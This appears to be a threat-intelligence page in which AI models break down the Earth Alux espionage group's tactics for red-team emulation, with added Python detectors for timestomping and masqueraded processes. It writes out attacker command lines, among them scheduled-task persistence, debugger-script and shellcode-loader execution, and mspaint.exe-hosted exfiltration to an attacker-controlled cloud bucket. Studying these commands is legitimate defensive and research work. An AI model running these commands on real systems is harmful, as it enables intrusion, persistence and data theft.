  • Procedure: The attacker utilizes VirTest to test their tools against security detections and enhance evasive features by identifying code causing file-based detections.

outcomes across your entire digital estate. Backed by decades of cybersecurity leadership and Trend Cybertron, the industry's first proactive cybersecurity AI, it delivers proven results: a 92% reduction in ransomware risk and a 99% reduction in detection time. Security leaders can benchmark their posture and showcase continuous improvement to stakeholders. With Trend Vision One, you’re enabled to eliminate security blind spots, focus on what matters most, and elevate security into a strategic partner for innovation.

Trend Vision One Threat Intelligence

To stay ahead of evolving threats, Trend Vision One customers can access a range of Intelligence Reports and Threat Insights. Threat Insights helps customers stay ahead of cyber threats before they happen and allows them to prepare for emerging threats by offering comprehensive information on threat actors, their malicious activities, and their techniques. By leveraging this intelligence, customers can take proactive steps to protect their environments, mitigate risks, and effectively respond to threats.

Trend Vision One Intelligence Reports App [IOC Sweeping]

The Espionage Toolkit of Earth Alux: A Closer Look at its Advanced Techniques

Trend Vision One Threat Insights App

Threat Actor: Earth Alux
Emerging Threat: The Espionage Toolkit of Earth Alux: A Closer Look at its Advanced Techniques

Hunting Queries

Trend Vision One Search App

Trend Vision One customers can use the Search App to match or hunt for the malicious indicators mentioned in this blog post with data in their environment.

Earth Alux Malware

malName: (VARGEIT OR RAILLOAD OR RAILSETTER) AND eventName: MALWARE_DETECTION

More hunting queries are available for Trend Vision One customers with Threat Insights Entitlement enabled.

Indicators of Compromise (IoC)

The indicators of compromise for this entry can be found here:

Tags

Phase: Initial Access

  • Technique: Exploitation of Vulnerable Services on Exposed Servers
  • Procedure: The report describes initial access through exploitation of vulnerable services on internet-facing servers, followed by a web shell such as GODZILLA that delivers the first-stage backdoor. VARGEIT, RAILLOAD, and RAILSETTER are the malware family names used in the hunting query above, not attachment names, and the report does not describe spear phishing.

Phase: Execution

  • Technique: Malicious Program Execution
  • Procedure: The delivered components are started by a renamed cdb.exe running a debugger script, by DLL side-loading from a legitimate host executable, or by a command-line shellcode loader (RSBINJECT); each stage triggers the next.

Phase: Persistence

  • Technique: Scheduled Task Creation
  • Procedure: RAILSETTER creates a scheduled task as the main persistence mechanism for the backdoors. The report does not give the task name, binary path, or trigger; the command below is a generic schtasks invocation of that shape, with placeholder values, kept only to show what a hunt for the behaviour should look for:
  • schtasks /create /tn "Updater" /tr "C:\ProgramData\update.exe" /sc minute /mo 10

Phase: Privilege Escalation

  • Technique: Not documented
  • Procedure: The report does not describe a privilege escalation step. The inference that misconfigured administrative privileges are abused has no support in the report and should not be emulated on its basis.

Phase: Defense Evasion

  • Technique: Masquerading, API Unhooking, and Timestomping
  • Procedure: Tools are renamed after system binaries (cdb.exe as fontdrvhost.exe, RSBINJECT as dwm.exe); MASQLOADER overwrites the in-memory code section of ntdll.dll with the copy on disk to remove API hooks; RAILSETTER timestomps RAILLOAD and its host. The report does not describe obfuscated scripts.

Phase: Credential Access

  • Technique: Not documented
  • Procedure: The report does not describe keylogging or credential dumping (such as Mimikatz); that inference has no support in the report.

Phase: Lateral Movement

  • Technique: Tool Hosting in Injected mspaint.exe
  • Procedure: VARGEIT launches mspaint.exe instances and injects tools from the C&C into them; the report does not mention PsExec-style remote service execution.

Phase: Collection and Exfiltration

  • Technique: Data Compression and Exfiltration to Cloud Storage
  • Procedure: A compression tool injected into mspaint.exe packs the collected files into a .tar.gz archive, and an exfiltration tool, also run inside mspaint.exe, uploads the archive to an attacker-controlled cloud storage bucket.

This set of tactics and procedures, reconciled with what the report actually documents, allows a red team to emulate the activities associated with the Earth Alux threat actor and its espionage toolkit.

Gemini 2.0

Model: gemini-2.0-flash

Phase: Initial Access

  • Technique: Exploiting Vulnerable Services
  • Procedure: The attacker exploits vulnerable services in exposed servers.

  • Technique: Webshell Deployment

  • Procedure: The attacker deploys webshells such as GODZILLA to facilitate the delivery of backdoors.

Phase: Execution

  • Technique: VARGEIT Installation via Debugger Script
  • Tool: cdb.exe (renamed as fontdrvhost.exe)
  • Command: C:\programdata\fontdrvhost.exe -cf c:\programdata\config.ini -o c:\programdata\fontdrvhost.exe

  • Technique: COBEACON Execution via Shellcode Loader
  • Tool: RSBINJECT (Rust-based command line shellcode loader)
  • Procedure: The attacker uses custom shellcode loader tools such as RSBINJECT to execute COBEACON.

  • Technique: VARGEIT Injection into mspaint Process
  • Procedure: VARGEIT can directly inject code received from its C&C server into a controlled mspaint process.

  • Technique: MASQLOADER Code Overwrite
  • Procedure: The attacker uses MASQLOADER to overwrite the code section of ntdll.dll in memory (see Defense Evasion below).

Phase: Persistence

  • Technique: Scheduled Task Creation
  • Procedure: Earth Alux backdoors (VARGEIT, COBEACON) are configured to establish persistence with scheduled tasks.

  • Technique: RAILSETTER for Persistence

  • Tool: RAILSETTER (persistence installer component)

  • Technique: Timestomping

  • Tool: RAILSETTER is used to perform timestomping for RAILLOAD.

Phase: Defense Evasion

  • Technique: Anti-API Hooking
  • Procedure: MASQLOADER overwrites the code section of ntdll.dll with the original ntdll.dll from disk to evade API hooks.

  • Technique: Execution Guardrails and Evasion via RAILLOAD and RAILSETTER
  • Procedure: RAILLOAD can enforce execution guardrails that restrict where its payload runs; RAILSETTER supplies the evasive measures, including the timestomping of RAILLOAD and its host.

Phase: Discovery

  • Technique: Network/LDAP Reconnaissance via mspaint
  • Command: C:\Windows\System32\mspaint.exe sElf98RqkF ldap <IP> <AD Domain> <machine AD domain>

  • Technique: Security Event Log Discovery via mspaint

  • Command: C:\Windows\System32\mspaint.exe Aslire597 <additional parameters>

Phase: Resource Development (Tool Testing)

  • Technique: DLL side-loading tests
  • Tool: ZeroEye (scans an EXE's import table for imported DLLs that can be abused for side-loading)

  • Technique: Clone Export Table
  • Tool: CloneExportTable.exe
  • Command: CloneExportTable.exe targetPe, referencePe

Phase: Lateral Movement

  • Technique: MSPaint Injection
  • Procedure: Tools are injected into mspaint process via VARGEIT.

Phase: Collection and Exfiltration

  • Technique: Data Compression
  • Procedure: Collects data by loading a custom compression tool to mspaint.

  • Command: C:\Windows\System32\mspaint.exe <target directory for compression> <path and filename of compressed file> <unknown argument>

  • Technique: Data Exfiltration

  • Command: C:\Windows\System32\mspaint.exe gWgGfsq1PcUUoo <region> <bucket name> <ID> <secret> <expire time> dm9TTlEwMoNXRkF3TXRkM3RVSHg3SGQ3TDl4YVNRNGY= <path of data for exfiltration>

Phase: Execution During Remote Operations

  • Technique: Remote Code Execution via MSPaint
  • Procedure: VARGEIT can launch multiple instances of MSPaint to host tools from the C&C.

  • Technique: Code Injection in mspaint
  • Procedure: Shellcode from the C&C is injected into an mspaint instance using RtlCreateUserThread, VirtualAllocEx, and WriteProcessMemory.

Gemini 2.5

Model: gemini-2.5-flash-preview-05-20

Here's a structured breakdown of Earth Alux's TTPs for red team emulation:

Phase: Initial Access

  • Technique: Exploiting Vulnerable Services
  • Procedure: Earth Alux exploits vulnerable services in exposed servers to gain initial access.
  • Technique: Web Shell Deployment
  • Tool/Program: GODZILLA
  • Procedure: Implants web shells such as GODZILLA to facilitate the delivery of first-stage backdoors.

Phase: Execution

  • Technique: Debugger Script Execution (LOLBAS method)
  • Tool/Program: cdb.exe (often renamed to fontdrvhost.exe)
  • Command: C:\programdata\[renamed_cdb.exe] -cf <config_ini_script_path> -o <output_file_path>
  • Procedure: The renamed cdb.exe acts as a debugger and host, running a script containing both a loader shellcode and the code for VARGEIT.
  • Technique: DLL Side-Loading
  • Tool/Program: MASQLOADER (e.g., masquerading as msedge.dll), COBEACON, VARGEIT (second stage), RAILLOAD (e.g., masquerading as userenv.dll), RAILSETTER
  • Procedure: A legitimate executable (e.g., Msmpsrv.exe, fontdrvhost.exe / esfui.exe) loads a malicious DLL which then executes a payload.
  • Technique: Shellcode Loading
  • Tool/Program: RSBINJECT (Rust-based command line shellcode loader, often renamed to dwm.exe)
  • Command: [renamed_rsbinject.exe] binfile <shellcode_file_path>
  • Command: [renamed_rsbinject.exe] hexstring <shellcode_hex_string>
  • Technique: Remote Code Execution via Process Injection (MSPaint / Conhost)
  • Tool/Program: VARGEIT (injecting into mspaint.exe or conhost.exe)
  • API Calls: RtlCreateUserThread, VirtualAllocEx, WriteProcessMemory
  • Procedure: VARGEIT launches an instance of mspaint.exe or conhost.exe and injects shellcode directly from the C&C server without file landing.

Phase: Persistence

  • Technique: Scheduled Task Creation
  • Tool/Program: RAILSETTER
  • Procedure: RAILSETTER creates a scheduled task as the main method for persistence for Earth Alux's backdoors.

Phase: Defense Evasion

  • Technique: Timestomping
  • Tool/Program: RAILSETTER
  • Procedure: RAILSETTER modifies the create, access, and modify times of RAILLOAD and its host to evade detection.
  • Technique: Anti-API Hooking (NTDLL Overwriting)
  • Tool/Program: MASQLOADER
  • Procedure: MASQLOADER overwrites the code section of ntdll.dll in its memory space with the original code from the file, effectively bypassing API hooks inserted by monitoring tools.
  • Technique: File Deletion / Track Removal
  • Procedure: Messages processed by the backdoor and controller in the Outlook draft folder are deleted to remove communication tracks.
  • Technique: Binary Masquerading / Renaming
  • Procedure: Threat actor tools (e.g., cdb.exe renamed to fontdrvhost.exe, RSBINJECT renamed to dwm.exe) are renamed to appear as legitimate system processes or files.
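
The timestomping entry above is the one defenders can check from disk artifacts alone. The following is an added example, not code from Trend Research or from RAILSETTER: it applies the standard $STANDARD_INFORMATION versus $FILE_NAME comparison to constructed, MFT-derived records. The record layout, the assumption that the host executable and its side-loaded DLL were stamped to the same value, and all sample timestamps are inventions for this example.

```python
"""Detecting the timestomping described above from NTFS metadata. This is an
added example, not code from Trend Research or from RAILSETTER. It works on
constructed, MFT-derived records: $STANDARD_INFORMATION ($SI) stamps, which
SetFileTime-style tools can rewrite, next to $FILE_NAME ($FN) stamps, which
only the NTFS driver updates. The record layout and sample values are
assumptions made for this example."""
from datetime import datetime, timezone
from itertools import combinations
import ntpath


def _ts(value):
    """Parse an ISO-8601 UTC stamp (six fractional digits or none)."""
    return datetime.fromisoformat(value).replace(tzinfo=timezone.utc)


def timestomp_indicators(record):
    """Return indicator strings for one file record (empty when clean)."""
    si_c, si_m, si_a = (_ts(record[k]) for k in ("si_created", "si_modified", "si_accessed"))
    fn_c, fn_m = _ts(record["fn_created"]), _ts(record["fn_modified"])
    hits = []
    # $FN stamps are copied from $SI when the name is created; rewriting $SI
    # to an earlier time leaves $SI behind $FN, which normal file operations
    # never produce.
    if si_c < fn_c:
        hits.append("$SI created before $FN created")
    if si_m < fn_m:
        hits.append("$SI modified before $FN modified")
    # Tools that set times at one-second granularity leave every fractional
    # field at zero; genuine stamps almost always carry sub-second values.
    if all(t.microsecond == 0 for t in (si_c, si_m, si_a)):
        hits.append("$SI stamps have zero sub-second component")
    return hits


def paired_stamp_indicators(records):
    """Pairs of files in one directory whose $SI created/modified stamps are
    identical while each disagrees with its own $FN: the pattern left when
    one tool stamps a side-loaded DLL and its host with the same value."""
    pairs = []
    for a, b in combinations(records, 2):
        same_dir = ntpath.dirname(a["path"]).lower() == ntpath.dirname(b["path"]).lower()
        same_si = (a["si_created"], a["si_modified"]) == (b["si_created"], b["si_modified"])
        both_off = all(r["si_created"] != r["fn_created"] for r in (a, b))
        if same_dir and same_si and both_off:
            pairs.append((a["path"], b["path"]))
    return pairs


# Constructed records (not real MFT data). The two ProgramData files model a
# dropped host and its side-loaded DLL, both assumed to be stamped to the
# System32 copy's timestamps; the other two are ordinary files.
SAMPLE_RECORDS = [
    {"path": r"C:\Windows\System32\userenv.dll",
     "si_created": "2023-05-10T09:15:22.123456", "si_modified": "2023-05-10T09:15:22.123456",
     "si_accessed": "2024-12-01T08:00:00.100000",
     "fn_created": "2023-05-10T09:15:22.123456", "fn_modified": "2023-05-10T09:15:22.123456"},
    {"path": r"C:\ProgramData\esfui.exe",
     "si_created": "2023-05-10T09:15:22", "si_modified": "2023-05-10T09:15:22",
     "si_accessed": "2023-05-10T09:15:22",
     "fn_created": "2024-11-20T03:41:07.559201", "fn_modified": "2024-11-20T03:41:07.559201"},
    {"path": r"C:\ProgramData\userenv.dll",
     "si_created": "2023-05-10T09:15:22", "si_modified": "2023-05-10T09:15:22",
     "si_accessed": "2023-05-10T09:15:22",
     "fn_created": "2024-11-20T03:41:09.102337", "fn_modified": "2024-11-20T03:41:09.102337"},
    {"path": r"C:\Users\a\Documents\notes.txt",
     "si_created": "2024-01-02T10:00:00.500000", "si_modified": "2024-03-01T11:00:00.250000",
     "si_accessed": "2024-03-01T11:00:00.250000",
     "fn_created": "2024-01-02T10:00:00.500000", "fn_modified": "2024-01-02T10:00:00.500000"},
]

if __name__ == "__main__":
    for r in SAMPLE_RECORDS:
        print(r["path"], timestomp_indicators(r))
    print(paired_stamp_indicators(SAMPLE_RECORDS))
```

The per-file checks flag the dropped host and the DLL on every rule while the legitimate System32 copy and the user document stay clean; the pairing check then ties the two dropped files together. A file copied or moved onto the volume legitimately gets fresh $FN stamps too, so treat these as triage leads to confirm against the PE compile timestamp and USN journal, not as proof on their own.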

Phase: Command and Control

  • Technique: C2 Communication over Outlook Graph API
  • Tool/Program: VARGEIT
  • Procedure: VARGEIT utilizes the Outlook draft folder for message exchanges with the C&C server. Backdoor messages are prepended with p_, while messages from the controller are prepended with r_.
  • Technique: Data Encoding and Encryption
  • Procedure: C2 message bodies are encrypted using AES-128 CBC mode, compressed using zlib, and then stored as a base64-encoded string.

Phase: Discovery

  • Technique: Security Event Log and Group Policy Discovery via Injected Process
  • Tool/Program: mspaint.exe (injected by VARGEIT)
  • Command: C:\Windows\System32\mspaint.exe Aslire597 <additional_parameters>
  • Technique: Network/LDAP Reconnaissance via Injected Process
  • Tool/Program: mspaint.exe (injected by VARGEIT)
  • Command: C:\Windows\System32\mspaint.exe sElf98RqkF ldap <generic_ip_placeholder> <generic_ad_domain_placeholder> <generic_machine_ad_domain_placeholder>
  • Procedure: The network/LDAP reconnaissance process generates various files containing network information.

Phase: Collection

  • Technique: Data Compression via Injected Process
  • Tool/Program: mspaint.exe (injected with a custom compression tool)
  • Command: C:\Windows\System32\mspaint.exe <target_directory_for_compression> <path_and_filename_of_compressed_file> <unknown_argument>
  • Procedure: Collected files (including those produced during the discovery stage) are compressed into .tar.gz format.

Phase: Exfiltration

  • Technique: Data Exfiltration to Cloud Storage via Injected Process
  • Tool/Program: mspaint.exe (injected with an exfiltration tool)
  • Command: C:\Windows\System32\mspaint.exe gWgGfsq1PcUUoo <region_placeholder> <bucket_name_placeholder> <id_placeholder> <secret_placeholder> <expire_time_placeholder> <encoded_payload_placeholder> <path_of_data_for_exfiltration_placeholder>
  • Procedure: The compressed data is exfiltrated to an attacker-controlled cloud storage bucket.
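
The Execution, Defense Evasion, Discovery, Collection and Exfiltration entries above share one observable: a system binary (mspaint.exe, or a tool renamed fontdrvhost.exe or dwm.exe) started with a command line it would never have on its own. The following is an added example, not code from Trend Research or from the Earth Alux toolset, that turns those entries into hunting logic over process-creation telemetry. Field names follow Sysmon Event ID 1 (Image, CommandLine, OriginalFileName); the sample events are constructed for this example, and the list of renamed-binary names and mspaint argument tokens is taken from the entries above.

```python
"""Hunting the LOLBin and masquerading patterns listed above in process-
creation telemetry. This is an added example, not code from Trend Research
or from the Earth Alux toolset. Input records use Sysmon Event ID 1 field
names (Image, CommandLine, OriginalFileName); the sample records are
constructed for this example and are not observed events."""
import ntpath
import re

SYSTEM32 = r"c:\windows\system32"

# System binary names the report says the actor reuses for renamed tools.
MASQUERADED_NAMES = {"fontdrvhost.exe", "dwm.exe"}
# Debuggers that were renamed; Sysmon's OriginalFileName keeps the real name.
DEBUGGER_ORIGINAL_NAMES = {"cdb.exe", "ntsd.exe", "windbg.exe"}
# First-argument tokens seen in the injected mspaint.exe command lines.
MSPAINT_VERBS = {"sElf98RqkF", "Aslire597", "gWgGfsq1PcUUoo"}
IMAGE_FILE = re.compile(r"\.(png|jpe?g|bmp|gif|tiff?|dib|ico)$", re.I)


def split_cmdline(cmdline):
    """Tokenise a Windows command line, keeping quoted paths whole."""
    tokens = re.findall(r'"[^"]*"|\S+', cmdline)
    return [t[1:-1] if len(t) >= 2 and t[0] == t[-1] == '"' else t for t in tokens]


def findings_for(event):
    """Return the list of findings for one process-creation event."""
    image = event["Image"].lower()
    base = ntpath.basename(image)
    directory = ntpath.dirname(image)
    args = split_cmdline(event.get("CommandLine", ""))[1:]
    orig = event.get("OriginalFileName", "").lower()
    hits = []

    # 1. mspaint.exe takes at most one argument, the image to open. Anything
    #    else is a sign the process is hosting an injected tool.
    if base == "mspaint.exe" and args:
        if args[0] in MSPAINT_VERBS:
            hits.append(f"mspaint with known VARGEIT tool verb {args[0]}")
        elif len(args) > 1 or not IMAGE_FILE.search(args[0]):
            hits.append("mspaint with unexpected arguments")

    # 2. Renamed tools: a system process name outside System32, or an
    #    OriginalFileName that identifies a debugger behind another name.
    if base in MASQUERADED_NAMES and directory != SYSTEM32:
        hits.append(f"{base} running from {directory}")
    if orig in DEBUGGER_ORIGINAL_NAMES and orig != base:
        hits.append(f"debugger {orig} renamed to {base}")

    # 3. cdb/ntsd script execution (-cf <script>) whatever the file is called.
    if any(a.lower() == "-cf" for a in args):
        hits.append("debugger script execution via -cf")
    return hits


def hunt(events):
    """Map each event index to its findings, skipping clean events."""
    return {i: f for i, f in ((i, findings_for(e)) for i, e in enumerate(events)) if f}


# Constructed sample telemetry (not observed data).
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\mspaint.exe",
     "CommandLine": r"C:\Windows\System32\mspaint.exe sElf98RqkF ldap 10.0.0.5 corp.example host.corp.example",
     "OriginalFileName": "mspaint.exe"},
    {"Image": r"C:\Windows\System32\mspaint.exe",
     "CommandLine": r'C:\Windows\System32\mspaint.exe "C:\Users\a\Pictures\cat.png"',
     "OriginalFileName": "mspaint.exe"},
    {"Image": r"C:\Windows\System32\mspaint.exe",
     "CommandLine": r"C:\Windows\System32\mspaint.exe C:\Users\a\Documents C:\ProgramData\out.tar.gz 1",
     "OriginalFileName": "mspaint.exe"},
    {"Image": r"C:\ProgramData\fontdrvhost.exe",
     "CommandLine": r"C:\programdata\fontdrvhost.exe -cf c:\programdata\config.ini -o c:\programdata\fontdrvhost.exe",
     "OriginalFileName": "CDB.EXE"},
    {"Image": r"C:\Windows\System32\dwm.exe", "CommandLine": r"C:\Windows\System32\dwm.exe",
     "OriginalFileName": "dwm.exe"},
    {"Image": r"C:\ProgramData\dwm.exe",
     "CommandLine": r"C:\ProgramData\dwm.exe binfile C:\ProgramData\stage.bin",
     "OriginalFileName": ""},
]

if __name__ == "__main__":
    for i, hits in hunt(SAMPLE_EVENTS).items():
        print(i, SAMPLE_EVENTS[i]["Image"], hits)
```

The opaque verb tokens are a convenience, not the core of the rule: the durable signals are an mspaint.exe with more than one argument or a non-image first argument, a process carrying a system binary's name outside System32, and an OriginalFileName of cdb.exe or ntsd.exe behind any other file name. The renamed RSBINJECT (no version resource, so OriginalFileName is empty) is caught only by the path rule, which is why that rule should not be dropped in favour of the name check.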

Phase: Testing & Development (Red Team Tooling / Preparation)

  • Technique: DLL Side-Loading Vulnerability Scanning
  • Tool/Program: ZeroEye.exe
  • Command: ZeroEye.exe -i <path_to_executable_file> (To list import tables of an executable)
  • Command: ZeroEye.exe -P <path_to_directory_for_whitelist_search> (To search for hijackable DLLs in specified paths)
  • Technique: Export Table Cloning
  • Tool/Program: CloneExportTable.exe
  • Command: CloneExportTable.exe <target_dll_path>, <reference_dll_path>
  • Procedure: Used to clone the export table of a specified DLL into another DLL (e.g., for RAILLOAD samples).
  • Technique: Evasion Capability Testing
  • Tool/Program: VirTest.exe
  • Procedure: Used to pinpoint codes in tools that cause file-based detections from security software, allowing for modification to bypass such detections.